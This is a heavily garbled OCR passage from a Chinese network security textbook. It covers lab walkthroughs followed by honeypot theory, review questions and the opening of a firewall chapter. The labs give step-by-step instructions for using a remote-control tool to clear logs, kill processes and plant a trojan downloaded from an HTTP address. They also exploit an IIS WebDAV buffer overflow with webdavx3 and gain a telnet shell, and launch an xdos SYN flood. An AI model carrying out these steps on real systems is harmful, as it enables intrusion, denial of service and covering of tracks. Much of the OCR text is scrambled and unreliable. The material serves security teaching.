文件 (有 纺 纺 (查看 V) 工具 (Tm 村 屿 (H) | 
组 织 ” 。 新 于 文件 夫 -© 
六 类 和 名称 修改 日 期 um 大 小 
曙 下 载 BB boot 2010/11/22 5:56 。 文 慎 奕 
PE Bes 2010/11/22 5:56 。 文件 夹 
各 井 5 问 的 位置 sources 2010/11/22 556 。 文件 夫 
上 support 2010/11/22 556 。 文件 奖 
同 库 上 upgrade 201o111/22 5:56 。 文 闪 夫 
国 视 需 国 autorun 2010/11/22 5:56 。。 安装 信息 1KB 
[DD becotmer 2010/11/22 5:56 。 文件 375 KB 
Wt LD bootmgr.efi 2010/11/22 5:56 ER 文件 654 KB 
遇 文 机 seup 2010/11/22 5:56 。 应 用 程序 105 KB 
言 乐 
9 个 对 象 
b 
9 个 项 目 @ Intenet 


图 6-27 访问 远程 主机 的 D 盘 


当然 ,可 在 CMD 文本 框 中 输入 其 他 命令 ,达到 远程 运行 各 种 程序 的 目的 。 


(4) 清除 远程 主机 上 的 日 志 。 黑 客 为 了 消除 各 种 入 侵 痕 迹 ,最 后 需要 清除 日 志 。 在 “日 
志 ” 选 项 卡 中 ,输入 远程 主机 的 IP 地 址 .用户 名 和 密码 后 , 单 击 * 开 始 执行 ?按钮 ,可 以 清除 远 


程 主 机 上 的 日 志 。 


(5) 重新 启动 远程 主机 。 在 “重启 "选项 卡 中 ,输入 远程 主机 的 IP 地 址 ,用户 名 和 密码 


后 , 单 击 “ 开 始 执 行 ” 按 钮 , 即 可 重新 启动 远程 主机 。 
(6) 控制 远程 主机 中 的 进程 ,步骤 如 下 。 


步骤 1: 在 “进程 "选项 卡 中 ,输入 远程 主机 的 IP 地 址 .用户 名 和 密码 后 ,在 进程 列表 处 
右 击 ,选择 “获取 进程 信息 ”命令 ,可 以 显示 主机 了 上 目前 正在 运行 的 所 有 进程 。 
步骤 2: 如 果 需 要 关闭 某 进程 ,如 SnagIt32. exe, 可 右 击 该 进程 ,选择 “关闭 进程 "命令 即 


可 ,如 图 6-28 所 示 。 


Terninal | Telnet | CiD 命令 | 日 志 | 重启 | 进程 服务 | 共享 | 种 植 者 











运程 主机 :|1921681012 用 户 名 : Pan 二 9 六 
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由 | 进香 Process ID | 路 径 ~ 
netl. exe 1560 C:\Windows\systen32\netl. exe 
netl, exe 992 C:\Windows\systen32\netl, exe 
中 | services. exe 536 C:\Windows\systen32\services. exe 
中 | snss. exe 32 
上 | SnagPriv. exe 2600 区 到 进程 信息 Fator\Desktop\SnagIt\Si 
中 | spoolzv.exe 1032 32\spoolsv. exe 
上 | :ppzvc.exe 1044 32\sppsve. exe 
svchost.exe 652 32\svchost. exe 
和 | svehost. exe 728 到 服务 信息 32\svchost. exe 
svehost. exe 816 启动 /停止 服务 32\svchost. exe 
和 | svehost. exe 64 32\svchost. exe 
svehost. exe 916 区 到 共 享 信息 32\svchost. exe - 
二 Dt ~ 
创建 共享 2 
佛山 顺德 











~ Ematdhe_883@163com 


图 6-28 远程 主机 上 的 进程 
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(7) 控制 远程 主机 中 的 服务 ,步骤 如 下 。 

步骤 1: 在 “服务 ?选项 卡 中 ,输入 远程 主机 的 IP 地 址 ,用户 名 和 密码 后 ,在 服务 列表 处 
右 击 , 选 择 “ 获 取 服 务 信息 ”命令 ,可 以 显示 主机 B 上 的 所 有 服务 名 、 当 前 状态 .启动 类 型 和 
路 径 等 信息 ,如 图 6-29 所 示 。 


Terninal | Telnet | CID 命令 | 日 志 | 重启 | 进程 [服务 共享 | 种 植 者 | 











远程 主机 :| 521681012 用 户 名 : annetator 本: 三 


CertPropSvc | ss 32\svchos 


‘ mn 











™ E-maildhe_888@163.com 





图 6-29 远程 主机 上 的 服务 


其 中 “状态 ” 列 中 ,Running 表示 该 服务 已 经 启用 ,Stopped 表示 该 服务 已 经 停止 。“ 启 
动 类 型 ? 列 中 ,Auto 表示 自动 启动 ,Manual 表示 手动 启动 ,Disabled 表示 已 禁用 。 

步骤 2: 可 以 右 击 某 个 服务 ,选择 “启动 /停止 服务 ”命令 ,改变 所 选 服务 的 当前 状态 。 

(8) 控制 远程 主机 中 的 共享 ,步骤 如 下 。 

步骤 1: 在 “共享 ”选项 卡 中 ,输入 远程 主机 的 IP 地 址 ,用户 名 和 密码 后 ,在 共享 列表 处 
右 击 ,选择 “获取 共享 信息 ”命令 ,可 以 查看 远程 主机 当前 所 有 的 共享 信息 ,如 图 6-30 所 示 。 







Terninal | Telnet | CID 命令 | 日志 | 重启 | 进程 | 服务 | 共享 种 植 者 | 


| as: pg Po aaF 





























一 “Emaidhe_888G163 com 








图 6-30 远程 主机 上 的 共享 
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步骤 2: 如 果 要 在 远程 主机 上 新 建 共享 ,可 以 右 击 共享 列表 ,选择 “创建 共享 ”命令 ,此 时 
会 连续 弹出 三 个 对 话 框 ,根据 提示 分 别 输入 要 创建 的 共享 名 共享 路 径 和 备注 信息 后 , 即 可 
在 远程 主机 上 新 建 共享 磁盘 或 文件 夹 。 用 这 种 方法 新 建 的 共享 与 使 用 CMD 命令 新 建 的 共 
享 是 一 样 的 ,在 远程 主机 上 不 会 显示 共享 图 标 , 且 为 完全 共享 。 

步骤 3: 如 果 需 要 关闭 某 共 享 ,可 以 在 该 共享 上 右 击 ,选择 “关闭 共享 ”命令 即 可 。 

(9) 向 远程 主机 种 植木 马 , 步 骤 如 下 。 

步骤 1: 在 “种 植 者 ”选项 卡 中 ,输入 远程 主机 的 耳 地址 .用户 名 和 密码 ,选中 Http 下载” 
单 选 按钮 ,在 “文件 目录 ”文本 框 中 输入 木马 程序 的 下 载 地 址 ,如 “Http://192. 168. 10. 11/ 木 
马 . exe”, 必 须 以 Http 开头 。 在 “启动 参数 ”文本 框 中 输入 “木马 . exe”, 如 图 6-31 所 示 。 





























Terninal | Telnet | cD 命令 | 日 志 | 重启 | 进程 | 职务 | 共享 || 种植 者 
[ 朋 加 设置 一 一 一 一 一 一 一 一 
程序 种 植 者 端口 T Bi | 
运程 主机 设置 一 一 一 一 | NTLM: 
| a 
用 户 名 :dmnestalor 个 IPC 上 传 _6 Hp 下 载 | 
一 一 本 地 文件 a 
bi | “| #4 可 
对 办 路 径 可 | 
ip//1921681011/ 林 马 
启动 扣 数 | 林 己 ee | 
司 ui 
~ Ematdhe_888@163.com 





图 6-31 向 远程 主机 种 植木 马 


步骤 2: 单 击 “开始 下 载 ? 按 钮 ,所 指定 的 木马 程序 文件 将 被 下 载 到 远程 主机 的 C:\ 
Windows\system32 目录 中 ,木马 程序 还 将 进行 倒计时 ,60s 后 启动 。 

步骤 3: 在 远程 主机 中 按 Shift 十 Ctrl 十 Esc 组 合 键 ,打开 “Windows 任务 管理 器 ”窗口 ， 
验证 “木马 . exe” 程 序 已 经 运行 ,如 图 6-32 所 示 。 


Tindovs 任务 管理 器 
文件 中) 选 顺 人 0) 查看 W) 帮助 00 


应 用 程序 进程 | 服务 。 | 性 能 | 联网 | 用 户 | 








StsTE O01 BO0K HW ker 





4,724K WI Pr 
5.744 kK 380 主 吉 





图 6-32 “Windows 任务 管理 器 ”窗口 
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6.4.2 任务 2: 缓冲 区 溢出 漏洞 攻击 的 演示 


1. 任务 目标 

(1) 掌握 利用 WebDAYV 缓冲 区 溢出 漏洞 进行 攻击 的 方法 。 

(2) 了 解 缓冲 区 溢出 漏洞 的 危害 性 。 

2. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7 操作 系统 的 计算 机 1 台 , 作 为 主机 A( 攻 击 机 )。 

(2) 安装 有 Windows 2000 Server(IIS 5.0) 操 作 系 统 的 计算 机 1 台 , 作 为 主机 BC 被 攻 
击 机 )。 

(3) WebDAVScan、WebDAVx3 工具 软件 各 1 套 。 

3. 任务 实施 步骤 

IIS 5. 0 默认 提供 了 对 WebDAV (web-based distributed authoring and versioning, 基 于 
Web 的 分 布 式 创 作 和 版 本 控制 ) 的 支持 ,WebDAYV 可 以 通过 HTTP 向 用 户 提 供 远 程 文件 存 
储 服务 。 但 是 IIS 5. 0 包含 的 WebDAYV 组 件 没有 充分 检查 传递 给 部 分 系统 组 件 的 数据 , 远 
程 攻击 者 可 以 利用 这 个 漏洞 对 WebDAYV 进行 缓冲 区 溢出 攻击 ,可 能 以 Web 进程 权限 在 系 
统 上 执行 任意 指令 。 

步骤 1: 设置 主机 A 的 IP 地 址 为 192.168.10.11, 主 机 B 的 IP 地 址 为 192.168. 10. 13， 
了 网 掩 码 均 为 255. 255. 255. 0。 主 机 A 利用 主机 B 上 的 WebDAYV 缓冲 区 溢出 漏洞 进行 
攻击 。 

步骤 2: 在 主机 A 上 运行 WebDAVScan 程序 ,设置 起 始 IP 地 址 和 结束 IP 地 址 均 为 
192. 168. 10.13, 单 击 “ 扫 描 ” 按 钮 进行 WebDAV 漏洞 扫描 ,结果 如 图 6-33 所 示 , 图 中 的 
Enable 表示 主机 B 确实 存在 WebDAYV 漏洞 。 


TI 地 址 数 设 村 1 
mn 和 mon | 8:|a 直 | aa go: 所 | 
天 ] 出 | ] 


I Miress MTP Banner Tab 
192 168. 10.13 Werosoft-IIS/5.0 




















图 6-33 ” WebDAV 缓冲 区 溢出 漏洞 扫描 


步骤 3: 复制 webdavx3. exe 程序 到 主机 A 的 *C:\” 中 ,并 修改 主机 A 的 时 钟 到 2003 年 
4 月 21 日 之 前 ,否则 攻击 程序 webdavx3. exe 将 不 能 启动 。 
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步骤 4: 修改 时 钟 后 ,在 主机 A 的 命令 行 提示 窗口 中 执行 webdavx3 192. 168. 10. 13 命 
令 ,对 主机 B 发 起 缓冲 区 溢出 漏洞 攻击 ,如 图 6-34 所 示 





国 管理 器 : C\Windows\system32Vcmd.exe 


sers\AdninistratorYcd 、\ 





(HD TI ET ET ET RENZ 








图 6-34 执行 webdavx3 命令 对 有 漏洞 的 计算 机 发 起 攻击 


步骤 5: 在 攻击 过 程 中 ,如 果 攻 击 停止 了 很 长 时 间 , 按 Ctrl 十 C 组 合 键 退出 。 
步骤 6: 再 执行 Telnet 192. 168. 10. 13 7788 命令 ,成功 入 侵 主 机 B, 获 得 了 对 主机 B 的 
管理 员 访 问 权 限 , 如 图 6-35 所 示 , 这 时 可 以 在 主机 B 上 执行 任何 命令 。 








画 Telnet 1921681013 国王 
ft Windous 2000 [Uersion 5.98.2195] < 
版 权 所 有 1985-1998 Microsoft Corp- 


BD 








图 6-35 成 功 人 侵 计 算 机 


6.4.3 任务 3: 拒绝 服务 攻击 的 演示 


1. 任务 目标 

(1) 理解 拒绝 服务 攻击 的 基本 原理 

(2) 了 解 拒绝 服务 攻击 的 危害 性 。 

2. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows Server 2003/2008 操作 系统 的 计算 机 1 台 ,作为 主机 A( 攻 击 机 ) 。 

(2) 安装 有 Windows 7 系统 的 计算 机 1 台 ,作为 主机 B( 被 攻击 机 )。 

(3) Sniffer Pro、xdos 工具 软件 各 1 套 

3. 任务 实施 步骤 

步骤 1: 设置 主机 A 的 IP 地 址 为 192.168.10.12, 主 机 B 的 IP 地 址 为 192. 168. 10. 11， 
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子 网 掩 码 均 为 255. 255. 255. 0。 关 闭 主 机 A 和 主机 B 中 的 防火 墙 ,保证 两 台 主机 能 相互 
Ping 通 。 

主机 A 将 要 对 主机 B 发 起 拒绝 服务 攻击 。 

步骤 2: 在 主机 B 上 开启 Web 服务 (80 端口 ) ,安装 并 运行 Sniffer Pro 程序 ,配置 好 捕 
捉 从 任意 主机 发 送 给 本 机 的 IP 数据 包 , 并 启动 捕 提 进程 。 

步骤 3: 在 主机 A 上 复制 xdos. exe 程序 到 主机 A 的 “C:\” 中 ,打开 命令 行 提示 窗口 , 执 
行 “xdos 192. 168. 10. 11 80 -t 300 -s * ”命令 ,对 主机 了 发 起 SYN FLOOD 拒绝 服务 攻击 ， 
如 图 6-36 所 示 。 











图 6-36 ”利用 xdos 程序 对 主机 B 发 起 拒绝 服务 攻击 


说 明 ”xdos. exe 命令 使 用 格式 为 :“xdos 一目 标 IP 端口 号 二 [-t 线程 数 ][ -s 源 
IP]”, 如 果 源 IP 为 x* ,表示 使 用 随机 IP 地 址 。 可 以 使 用 “xdos ?” 查 看 命令 的 使 用 格式 。 

步骤 4: 此 时 ,在 主机 B 上 可 以 看 到 计算 机 的 处 理 速 度 明显 下 降 , 其 至 瘫痪 死机 ,CPU 
使 用 率 明显 上 升 ,如 图 6-37 所 示 。 在 Sniffer Pro 的 传输 地 图 中 可 以 看 到 有 大 量 伪 造 IP 的 
主机 请 求 与 主机 B 建立 连接 ,如 图 6-38 所 示 





天 Windows 任 多 管理 县 ll 
[ 文 HP 远大 (0) 查看 MV) 和 幼 H) 
应 用 程序 进程“ 服务 | 性 能 ”| 联网 [用户 




















CPV 使 用 牵 CPV 使 用 记录 

内 存 | 

槐 温 内 存 0B) 

总 雪 1023 ge25 

已 委 存 315 454 

可用 69 43 

空间 396 0:00:04:34 
S38 / 2047 

核心 内 存 gp) 

分 员 玫 了 

未 页 z 

进程 数 : 43 











图 6-37 查看 CPU 使 用 率 
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时 Snifl: 和 库 , 83883 以 太 网 由 


Ir J :S|W|@| x| 天 | 如 




















erlow 


再 家 人 盘 柯 入 牛 了 人 主机 列表 人 ProtocolDst 人 查看 统计 表 为 这 当前 对 语 


图 6-38 攻击 时 在 传输 地 图 中 看 到 与 主机 B 的 连接 情况 











步骤 5: 在 





也 恢复 到 正常 水 平 。 在 Sniffer Pro 窗口 中 单 击 “ 停 止 和 显示 ”按钮 是 后 ,可 以 看 到 丰 





造 IP 的 求 与 主机 B 建立 





接 的 数据 包 , 如 图 6-39 所 示 。 


机 A 上 按 Ctrl 十 C 组 合 键 ,停止 攻击 。 主 机 B 恢复 快速 响应 ,CPU 使 用 























-elE 
21 囊 臣 D=80 ST LEN=0 VIN=16 
21 D=80 S=26438 SYN SEQ=40519 IEN=0 WIN=16 
217 11] TE ED-80 S-26439 SYH SEQ-40820 TEN-0 VIN-16 
21 D=80 S-26440 SYN SEQ=40521 IEN=0 WIN=16 
21 D=80 S-26441 SYN SEQ=40522 IEN=0 WIN=16 
220 D=80 S-26442 SYN SEQ=40523 IEN<0 WIN=16 
22 De80 S-26443 SYN SEQ=40524 IEN<0 WIN=16 
22 D=<80 S-26444 SYN SEO=40525 IEN<0 WIN=16 
22 D<80 S-26445 SYN SEQ=40526 IEN<0 WIN=16 
22 D<80 S=26446 SYN SEQ=40527 IEN<0 WIN=16 ~ 
22 NeAN S=2K447 SYN SFno4ns2R_TFNenl MTNe1K 
TCP, Next expected Seq nunber= 40519 = 
TCP: Data of fset = 20 bytes 
TCP: Reserved Bits: Reserved for Future Use (Not shown in the Hex Dunp) 
人 TCP: Flags = 02 
蚁 TcP 0 (No urgent pointer) 





TCP 0 = (No acknovledgnent) 
TcP = (No push) 
昌 TCP (No reset) 
TCR BD 
电 TCP 0 = (No FIN) E 
Ic Vindov 16384 


TCP: Checksum = 5599 (correct) 
BB TcP: Urgent pointer =0 ~ 


05000000， 00 Oc 29 04 61 3e 00 0c 29 32 51 16 08 00 45 00 
00000010: 00 28 ol 00 00 00 8d 06 18 63 43 e3 05 d7 c0 a8 .( 
00000020: 0a Ob 67 45 00 50 00 00 9e 46 00 00 00 00 50 醒 

00000030: 40 00 55 99 00 00 00 00 00 00 00 00 @ 

















计 表 为 这 








天 家 入 角 人 于 入 主机 到 天 入 Proteol Det 入 Eh 


图 6-39 捕捉 到 的 攻击 数据 包 
这 些 数 据 包 都 是 只 请 求 连 接 而 不 应 答 ,以 至 于 主机 B 保持 有 大 量 的 半 开 连 
度 明 显 下 降 ,甚至 瘫痪 死机 ,拒绝 合法 的 请 求 服务 。 
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65 拓展 提升 : 网 络 诱骗 技术 -富饶 


近 些 年 出 现 了 一 种 主动 吸引 黑客 侵入 的 诱骗 系统 一 蜜 锥 (honeypot) 技 术 , 属 主动 安 
全 防护 技术 。 这 种 技术 对 黑客 在 蜜 饶 系 统 中 的 攻击 行为 进行 追踪 和 分 析 , 寻 找 应 对 措施 。 

1. 蜜 缸 的 定义 

按照 美国 著名 安全 专家 L. Spizner 的 定义 : 密 饶 是 一 种 其 价值 在 于 被 探测 攻击、 破坏 
的 系统 。 即 蜜 摊 是 一 种 可 监视 、 观 察 攻击 者 行为 的 系统 。 蜜 钢 不 直接 提高 计算 机 网 络 的 安 
全 性 ,但 蜜 饶 通 过 伪装 ,使 黑客 在 进入 目标 系统 后 ,不 知道 自己 的 行为 已 处 在 监控 之 中 。 按 
照 现 在 的 定义 , 蜜 色 是 为 吸引 并 诱骗 那些 试图 非法 入 侵 计算 机 的 人 (如 : 黑客 ) 而 设计 的 ,是 
一 个 包含 漏洞 的 诱骗 系统 。 它 模拟 一 个 或 多 个 易 受 攻击 的 主机 ,给 攻击 者 提供 一 个 容易 攻 
击 的 目标 。 

蜜 饶 系 统 为 了 吸引 黑客 攻击 ,常常 有 意 在 系统 中 留 下 一 些 后 门 ,或 放置 网 络 黑客 希望 得 
到 的 一 些 敏 感 信息 (当然 这 些 信 息 都 是 假 信息 ) ,让 黑客 上 当 。 这 些 主机 表面 上 看 很 脆弱 , 易 
受 攻击 ,但 实际 上 不 包含 任何 敏感 数据 ,也 没有 合法 用 户 和 通信 ,能 够 让 入 侵 者 在 其 中 暴露 
无 遗 。 设 置 蜜 饶 主 要 有 两 个 目的 : 一 是 在 未 被 黑客 察觉 的 情况 下 监视 其 活动 ,收集 与 黑客 
有 关 的 信息 ;二 是 牵制 黑客 ,让 他 们 把 时 间 和 资源 都 耗费 在 攻击 蜜 饶 上 ,使 真正 的 工作 网 络 
得 到 保护 。 

2. 蜜 缸 的 功能 与 特点 

1) 收集 数据 的 真实 性 高 

蜜 饶 系 统 没 有 任何 实际 作用 ,其 收集 到 的 数据 很 少 ,但 收集 到 的 数据 很 大 可 能 就 是 由 黑 
客 攻击 造成 的 ,因此 真实 性 高 。 且 蜜 钢 不 依赖 于 任何 复杂 的 检测 技术 , 漏 报 率 和 误 报 率 
较 低 。 

2) 能 检测 未 知 的 攻击 

蜜 饶 提 供 一 些 漏 洞 吸引 各 种 攻击 者 进行 攻击 ,由 此 ,可 能 收集 到 新 的 攻击 工具 和 攻击 方 
法 。 而 大 多 数 入 侵 检 测 系统 (IDS) 只 能 检测 到 已 知 攻击 。 

3) 漏 报 率 和 误 报 率 低 

蜜 饶 有 很 强 的 检测 功能 ,从 其 原理 上 讲 , 凡 是 与 蜜 饶 的 连接 ,如 : 侦 听 扫描 等 , 蜜 饶 都 
认为 是 攻击 中 的 一 种 ,因此 , 蜜 钠 的 漏 报 率 和 误 报 率 极 低 , 远 低 于 大 多 数 IDS。 也 不 需要 担 
心 特征 数据 库 的 更 新 和 检测 引擎 的 修改 。 

4) 可 脱 机 工作 

蜜 饶 有 一 个 低 数据 污染 系统 和 牺牲 系统 .对 入 侵 进 行 响应 ,因此 蜜 钠 随时 能 脱 机 工作 。 
此 时 ,系统 管理 员 对 脱 机 的 系统 进行 分 析 , 并 把 分 析 的 结果 和 经 验 运用 到 以 后 的 系统 中 。 

5) 技术 实现 简单 

目前 有 很 多 成 熟 的 蜜 缸 模拟 软件 ,与 人 侵 检 测 等 其 他 安全 技术 相 比 , 蜜 镀 技 术 的 实现 相 
对 简单 ,通过 蜜 钠 .网络 管理 员 可 以 较 易 掌握 黑客 攻击 的 规律 。 
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6) 投入 较 少 

因为 蜜 钢 技 术 实现 简单 ,不 需要 强大 的 资源 支持 ,所 以 ,只 要 使 用 低 成 本 的 设备 就 可 构 
建 蜜 饶 , 不 需要 大 量 的 资金 投入 。 

7) 为 计算 机 取证 提供 支持 

有 些 蜜 钠 系 统 可 记录 攻击 者 的 聊天 内 容 . 管 理 员 通过 研究 和 分 析 这 些 记录 ,得 到 攻击 者 
采用 的 攻击 工具 、 攻 击 手段 和 攻击 目的 等 方面 的 信息 ,了 解 到 攻击 者 的 活动 范围 以 及 下 一 步 
的 攻击 目标 ,这 些 信息 都 是 今后 起 诉 攻击 者 的 证 据 。 即 蜜 钠 能 为 追踪 攻击 者 提供 线索 ,为 计 
算 机 取证 提供 支持 。 

3. 蜜 缸 的 分 类 

应 用 蜜 饶 技 术 主要 是 基于 安全 价值 上 的 考虑 。 根 据 不 同 的 标准 , 蜜 饶 技 术 有 着 不 同 的 
分 类 。 根 据 设计 的 最 终 目 的 不 同 , 蜜 钠 分 为 产品 型 和 研究 型 两 大 类 。 

1) 产品 型 蜜 馈 

产品 型 蜜 摊 作为 产品 使 用 ,设计 的 初 囊 就 是 希望 黑客 侵入 系统 ,从 而 对 黑客 的 行为 进行 
记录 和 分 析 。 

2) 研究 型 蜜 钠 

研究 型 蜜 饶 是 专用 于 研究 和 获取 攻击 信息 的 ,一 般 用 于 研究 机 构 和 军队 。 它 面 对 各 类 
网 络 威胁 ,收集 恶意 攻击 者 的 信息 ,寻找 能 够 对 付 这 些 威胁 更 好 的 办 法 。 

根据 蜜 挫 与 攻击 者 之 间 的 交互 , 蜜 钢 又 分 为 低 交 互 蜜 钠 、 中 交互 蜜 饮 和 高 交互 蜜 钢 三 种 
类 型 ,这 三 种 类 型 的 蜜 饶 对 应 着 蜜 饶 技 术 发 展 的 三 个 阶段 。 

(1) 低 交 互 蜜 饶 。 所 谓 低 交互 蜜 饶 是 指 对 各 种 系统 及 其 提供 的 服务 都 是 模拟 行为 的 蜜 
饶 。 这 种 蜜 饶 为 攻击 者 展现 的 攻击 弱点 和 攻击 对 象 都 是 假 的 。 巾 于 它 的 服务 都 是 模拟 行 
为 ,所 以 蜜 钠 获 得 的 信息 非常 有 限 , 只 能 对 攻击 者 做 简单 的 应 答 。 如 : nepenthes( 猪 笼 草 蜜 
饶 ) 就 是 一 种 典型 的 低 交 互 蜜 饶 , 它 不 能 提供 Windows 主机 的 完整 模拟 ,但 它 能 在 最 少 用 户 
干预 的 情况 下 ,自动 收集 基于 Windows 的 蠕虫 。 这 是 一 种 易于 安装 且 维护 工作 量 少 的 低 交 
互 蜜 饶 。 

(2) 中 交互 蜜 钠 。 所 谓 中 交互 蜜 钠 是 指 对 真正 操作 系统 的 各 种 行为 进行 模拟 的 蜜 钠 。 
这 种 蜜 钠 能 提供 较 多 的 交互 信息 ,同时 也 能 从 攻击 者 的 行为 中 获得 较 多 的 有 用 信息 。 在 这 
个 模拟 系统 中 , 蜜 饶 看 起 来 和 一 个 真正 的 操作 系统 没有 什么 区 别 。 

(3) 高 交互 蜜 负 。 真 正 有 漏洞 的 系统 允许 攻击 者 在 各 个 层面 上 与 系统 交互 ,这 种 系统 
就 称 为 高 交互 蜜 钠 。 高 交互 蜜 钠 有 一 个 真实 的 操作 系统 ,为 攻击 者 提供 真实 的 系统 场景 。 
当 攻 击 者 获得 ROOT 权限 后 , 受 系统 和 数据 真实 性 的 迷惑 ,其 活动 会 非常 猩 狂 ,由 此 蜜 饶 能 
记录 下 很 多 攻击 者 的 活动 和 行为 。 不 过 ,这 种 蜜 饶 的 缺点 是 被 人 侵 的 可 能 性 较 高 ,如 果 整 个 
蜜 饶 被 人 侵 , 那 么 它 有 可 能 成 为 黑客 实施 下 一 步 攻击 的 跳板 。 

由 此 可 见 , 不 同类 型 蜜 镀 的 区 别 主要 是 : 攻击 者 与 应 用 程序 或 服务 交互 能 力 的 不 同 。 
目前 国内 外 主要 的 蜜 饶 产 品 有 : DTK、 空 系统 .BOF、SPECTER、HOME-MADE 蜜 钠 和 
HONEYD 等 。 
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习 ” 题 
一 、 选 择 题 
1. 网 络 攻击 的 发 展 趋势 是 ( Js 
A. 黑客 技术 与 网 络 病毒 日 益 融 合 B. 攻击 工具 日 益 先 进 
C. 病毒 攻击 D. 黑客 攻击 


2. 拒绝 服务 攻击 (  “)。 
A. 用 超出 被 攻击 目标 处 理 能 力 的 海量 数据 包 消 耗 可 用 系统 、 带 宽 资源 等 方法 的 
攻击 
B. 全 称 是 distributed denial of services 
C. 拒绝 来 自 一 台 服务 器 所 发 送 回应 请 求 的 指令 
D. 入 侵 控制 一 台 服务 器 后 远程 关机 
3. 通过 非 直接 技术 的 攻击 手法 称 作 ( ) 攻 击 手 法 。 
A. 会 话 劫持 B. 社会 工程 学 C. 特权 提升 D. 应 用 层 攻击 
4. 关于 “攻击 工具 日 益 先 进 ,攻击 者 需要 的 技能 日 趋 下降 ” 的 观点 ,不 正确 的 是 ( Ws 
A. 网 络 受到 攻击 的 可 能 性 将 越 来 越 大 ”B. 网 络 受 到 攻击 的 可 能 性 将 越 来 越 小 


C. 网 络 攻击 无 处 不 在 D. 网 络 风险 日 益 严 重 
5. 网 络 监 听 是 ( )。 
A. 远程 观察 一 个 用 户 的 计算 机 B. 监视 网 络 的 状态 、 传 输 的 数据 流 
C. 监视 PC 系统 的 运行 情况 D. 监视 一 个 网 站 的 发 展 方向 
6. DDoS 攻击 破坏 了 ( 
A. 可 用 性 B. 保密 性 C. 完整 性 D. 真实 性 
7. 当 感 觉 操作 系统 运行 速度 明显 减 慢 ,最 有 可 能 受到 ( ) 攻 击 。 
A. 特洛伊 木马 B. 拒绝 服务 C. 欺骗 D. 中 间 人 攻击 
8. 在 网 络 攻击 活动 中 ,tribal flood network(TFN) 是 ( ) 类 型 的 攻击 程序 。 
A. 拒绝 服务 B. 字典 攻击 C. 网 络 监 听 D. 病毒 程序 
9. 人 ) 类 型 的 软件 能 够 阻止 外 部 主机 对 本 地 计算 机 的 端口 扫描 。 
A. 反 病 毒 软件 
B. 个 人 防火 墙 
C. 基于 TCP/IP 的 检查 工具 ,如 netstat 
D. 加 密 软 件 
10. 网 络 型 安全 漏洞 扫描 器 的 主要 功能 有 ( )。( 多 选 题 ) 
A. 端口 扫描 检测 B. 后 门 程序 扫描 检测 
C. 密码 破解 扫描 检测 D. 应 用 程序 扫描 检测 
E. 系统 安全 信息 扫描 检测 
二 、 填空 题 
1. 一 般 的 网 络 攻击 都 分 为 3 个 阶段 , 即 攻击 的 阶段 ,攻击 的 阶段 、 攻 
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击 的 阶段 。 

二 命令 有 助 于 了 解 网 络 的 整体 使 用 情况 。 它 可 以 显示 当前 正在 活动 的 网 络 
连接 的 详细 信息 ,如 采用 的 协议 类 型 、 当 前 主机 与 远 端 相连 主机 的 IP 地 址 以 及 它们 之 间 的 
连接 状态 等 。 

3. 命令 用 于 显示 本 地 计算 机 和 远程 计算 机 的 基于 TCP/IP 的 NetBIOS 统计 
资料 ,NetBIOS 名 称 表 和 NetBIOS 名 称 缓存 。 

4. 对 于 网 络 监听 ,可 以 采取 等 措施 进行 防范 。 

5. 暴力 破解 主要 是 基于 密码 匹配 的 破解 方法 ,最 基本 的 方法 有 两 个 : 法 
和 法 。 

6. 是 Windows 系统 特有 的 一 项 管理 功能 ,是 Microsoft 公司 为 了 方便 用 户 使 
用 计算 机 而 设 定 的 ,主要 用 来 远程 管理 计算 机 。 

nn 攻击 是 指 通 过 向 程序 的 缓冲 区 写 入 超出 其 长 度 的 内 容 , 造 成 缓冲 区 的 溢 
出 ,从 而 破坏 程序 的 堆栈 ,使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 

8. 攻击 就 是 想 办 法 让 目标 机 器 停止 提供 服务 或 资源 访问 ,这 些 资源 包括 磁盘 
空间 、 内 存 、 进 程 甚至 网 络 带 宽 , 从 而 阻止 正常 用 户 的 访问 ,其 攻击 的 方式 主要 有 攻 
击 和 攻击 。 

9. 攻击 是 一 种 基于 DoS 的 特殊 形式 的 拒绝 服务 攻击 ,是 一 种 分 布 .协作 的 大 
规模 攻击 方式 ,主要 瞄准 比较 大 的 站 点 , 像 商 业 公司 ,搜索 引擎 或 政府 部 门 的 站 点 。 

10. 技术 是 近 些 年 出 现 的 一 种 主动 吸引 黑客 侵入 的 诱骗 系统 , 属 主动 安全 防 
护 技术 。 

三 、 简 答题 

1. 什么 是 黑客 ? 常见 的 黑客 技术 有 哪些 ? 

2. 一 般 的 网 络 攻击 有 哪些 步骤 ? 

3. 简 述 端口 扫描 的 原理 。 

4. 常见 的 端口 扫描 技术 有 哪些 ? 它们 的 特点 是 什么 ? 

5, 什么 是 网 络 监听 ? 如 何 防 范 网 络 监听 ? 

6. 口令 破解 的 方法 有 哪些 ? 如 何 防 范 口 令 破译 ? 

7. 什么 是 拒绝 服务 攻击 ? 它 可 分 为 哪 几 类 ? 

8. 简 述 缓冲 区 溢出 攻击 的 原理 及 其 危害 。 
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项 目 7 防火 墙 技术 


【项 目 目标 】 


(1) 了 解 防火 墙 的 功能 和 类 型 。 

(2) 掌握 包 过 滤 防 火 墙 技术 。 

(3) 了 解 防火 墙 的 应 用 代理 技术 、 状 态 检测 技术 。 

(4) 掌握 Windows 防火 墙 中 网 络 位 置 的 作用 。 

(5) 掌握 Windows 防火 墙 中 入 站 、 出 站 和 连接 安全 规则 的 创建 方法 。 
(6) 了 解 Cisco PIX 防火 墙 的 配置 方法 。 


71 项 目 提出 


在 目前 网 络 受 攻击 案件 数量 直线 上 升 的 情况 下 ,用户 随时 都 可 能 遭 到 各 种 恶意 攻击 。 

张 先 生 近 期 备 受 计算 机 病毒 的 骚扰 ,虽然 了 安装 了 反 病 毒 软件 ,但 还 是 存在 很 多 安全 隐 
患 ,如 上 网 账号 被 窃取 及 冒 用 ,银行 账号 被 盗用 .电子 邮件 密码 被 修改 .财务 数据 被 利用 、 机 
密 档案 丢失 隐私 曝光 等 ,甚至 黑客 (hacker) 或 骇 客 (cracker) 能 通过 远程 控制 删除 硬盘 上 所 
有 的 资料 数据 ,整个 计算 机 系统 架构 全 面 崩溃 。 

为 了 进一步 提高 计算 机 及 网 络 的 安全 性 , 张 先生 请 好 友 李 先生 帮助 安装 一 款 防火 墙 软 
件 ,并 合理 设置 一 些 安全 规则 ,拦截 一 些 来 历 不 明 . 有 害 访问 或 攻击 行为 ,消除 安全 隐患 。 


